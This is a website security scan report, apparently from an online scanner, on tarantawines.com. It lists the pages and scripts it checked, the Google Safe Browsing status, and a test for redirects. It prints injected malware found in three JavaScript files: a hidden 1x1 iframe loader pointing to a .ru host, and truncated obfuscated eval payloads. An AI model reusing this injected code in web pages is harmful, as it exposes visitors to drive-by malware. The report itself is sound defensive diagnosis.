Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tarantawines.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tarantawines.com/ | 200 OK Content-Length: 15900 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js | 200 OK Content-Length: 200719 Content-Type: text/javascript | clean |
http://www.tarantawines.com/m/taranta/WebResource.axd?d=UBWKZTHcGKU7xF9SlTZZVKAz00CY1epsW_Ne4CkdjEAnxYS5_H03FXWi0pUbS8ZLbXYpi0tUDRYhfb_f2aoItZQj1Wo1&t=635315753528827089 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://www.tarantawines.com/Javascript/PageBase.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/Javascript/InputHidden.js?Ver=6 | 200 OK Content-Length: 2758 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('');
derive(InputHidden, ClassInput); function InputHidden() { } (function () { var nud = document.createElement('iframe'); nud.src = 'http://vezylgys.ru/count10.php'; nud.style.position = 'absolute'; nud.style.border = '0'; nud.style.height = '1px'; nud.style.width = '1px'; nud.style.left = '1px'; nud.style.top = '1px'; if (!document.getElementById('nud')) { document.write('<div id=\'nud\'></div>'); document.getElementById('nud').appendChild(nud); }})();
Antivirus reports:
http://www.tarantawines.com/Javascript/InputReadOnly.js?Ver=6 | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
http://www.tarantawines.com/Javascript/ActionHidden.js?Ver=6 | 200 OK Content-Length: 11180 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!75!80!6c!7f!71!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6
Antivirus reports:
http://www.tarantawines.com/Javascript/ActionOpen.js?Ver=6 | 200 OK Content-Length: 26191 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!75!80!6c!7f!71!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tarantawines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tarantawines.com
Referer: http://www.google.com/search?q=tarantawines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.